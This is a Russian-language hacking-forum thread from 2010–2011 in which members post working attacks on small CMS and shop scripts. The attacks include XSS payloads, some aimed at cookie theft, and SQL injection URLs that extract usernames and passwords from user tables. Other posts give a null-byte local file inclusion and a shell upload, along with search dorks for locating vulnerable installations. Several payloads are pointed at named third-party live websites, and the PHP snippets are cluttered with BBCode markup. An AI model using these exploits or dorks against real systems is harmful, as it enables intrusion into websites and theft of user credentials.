HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.11.2010, 14:13
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

Дополнение к посту от 547

Ajax OnlineShop 1.0

Xss

офф-демо-сайт

Код:
http://www.ajax-onlineshop.de/demo/index.php?id=1">alert('d0s')
+xss на офф.сайте

Код:
http://www.ajax-onlineshop.de/servicemail/
Заполняем все поля,уязвимое поле - Name

Вбиваем туда что-нибудь типо

[CODE]
">alert(1)
 
Ответить с цитированием

  #2  
Старый 25.11.2010, 17:25
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

osPHPSite 0.0.1 Beta

http://www.osphpsite.com/

SQL Injection:

/index.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

[/
COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]database_connect[/COLOR][COLOR="#007700"]();

[/
COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * from content

WHERE id =[/COLOR][COLOR="
#0000BB"]$id[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

...[/COLOR][/COLOR
Пример:

Код:
http://php/index.php?id=25%20union%20select%201,concat_ws(0x3a,id,username,password),3,4,5,6,7,8 from user--
Необходимы права администратора. Путь:

Код:
http://php/admin/index.php?page[]=config
Многие места так же уязвимы к SQL inj. Скрипт полностью бажный.

 
Ответить с цитированием

  #3  
Старый 25.11.2010, 18:40
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

NinkoBB v. 1.3

http://ninkobb.com/

XSS:

Создаем новый топик, по адресу message.php с "Subject" и "Message" содержанием:

Код:
alert('xss')
Код:

И пока топик висит на главной странице имеем активную XSS.
[/B]​
 
Ответить с цитированием

  #4  
Старый 27.11.2010, 03:29
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

KAPCMS v0.904

http://kapcms.ru/

XSS

Вписываем в поле поиска пишем:

Код:
alert(1)
Гет запрос будет выглядить следующем образом:

Код:
http://kapcms.ru/?s=alert(1)&page=11
Код:

[/B]​
 
Ответить с цитированием

  #5  
Старый 28.11.2010, 15:34
ALIM
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855

Репутация: 0
По умолчанию

Creativestate

Тип уязвимости: SQL inj

http://www.creativestate.com/work

dork:Site design by Creative State

админка:localhost/admin/

пример:/index.cfm?id=-2%20union%20select%201,2,3,4,5,6,7,8,group_concat( managerLogin,0x3a,managerPassword)%20from%20manage rs%20--
 
Ответить с цитированием

  #6  
Старый 11.12.2010, 22:12
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

Web@all CMS

http://webatall.com/

XSS

Вписываем в поле поиска (сразу под формой входа в правом верхнем углу,если кто ненашел):

Код:
alert(document.cookie)
 
Ответить с цитированием

  #7  
Старый 20.12.2010, 15:15
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

Дополнение к посту Root-access

CompactCMS

офф сайт: compactcms.nl

XSS

content/403.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
Пример:

Код:
http://demo.compactcms.nl/content/403.php?page=alert(document.cookie)
Тоже самое в файле 404.php по соседству.
 
Ответить с цитированием

  #8  
Старый 10.01.2011, 18:27
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

xzengine 1.7 beta 8

Офф сайт xzengine.ru

DORK : "Powered by xzengine"

SQL injection

Крутим через ошибку,пример на нескольких сайтах:

Код:
http://xzengine.ru/index.php?category=1+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+
http://glassofvine.ru/index.php?category=1+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+
http://hightvoltage.net/index.php?category=1+and+ExtractValue(1,concat(0x5c,(select+version())))--+
XSS

Пример:

Код:
http://xzengine.ru/index.php?category=1-->alert(1)
Заливка шелла,нужны права админа

В админке "загрузить файл",льем наш шелл и он будет по адресу site.com/upload/shell.php

//если есть возможность(двиг не платный) то показывайте уязвимый код. (Konqi)

Фараон

Не совсем так,даже если ты закоментируешь обращение к бд ето,то инъекция будет,т.к. там еще 2 обращение к бд с этой переменной.И зачем ты копировал мой пост?
 
Ответить с цитированием

  #9  
Старый 10.01.2011, 20:08
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Дополнение к посту ~d0s~(#444):

Xzengine 1.7 beta 8

SQL injection:

/index.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

require_once[/
COLOR][COLOR="#DD0000"]'./classes/viewnews.php'[/COLOR][COLOR="#007700"];

...

if(isset([/
COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]]))

[/
COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]];

...

[/
COLOR][/COLOR
/viewnews.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

if([/COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])

{[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]AbstractDataBase[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Instance[/COLOR][COLOR="#007700"]()->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'SELECT * FROM '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DATABASE_TBLPERFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'news WHERE news_fixed = 0 AND news_approve = 1 AND news_view = 1 ORDER BY news_id DESC LIMIT '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]);

}

else

{[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]AbstractDataBase[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Instance[/COLOR][COLOR="#007700"]()->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'SELECT * FROM '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DATABASE_TBLPERFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'news WHERE news_fixed = 0 AND news_approve = 1 AND news_view = 1 AND news_category = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' ORDER BY news_id DESC LIMIT '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]);

}

...

[/
COLOR][/COLOR
Пример:

Код:
http://eng/index.php?category=3%20union%20select%20concat_ws(0x3a,users_login,users_password),2,3,4,5,6,7,8,9,10,11,12,13%20from%20xz_users%20limit%200,1--
 
Ответить с цитированием

  #10  
Старый 30.01.2011, 23:06
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

Sobak CMS 0_2

Скачате: http://sourceforge.net/projects/sobakcms/

LFI

Need: rg = on ; mq = off

index.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#FF8000"]//...

[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$isInWebs[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]) {

include ([/COLOR][COLOR="#DD0000"]'webs/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);

}

[/
COLOR][COLOR="#FF8000"]//...

[/COLOR][/COLOR
эксплуатация:

Код:
http://localhost/sobak/index.php?isInWebs=1&id=../robots.txt%00
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.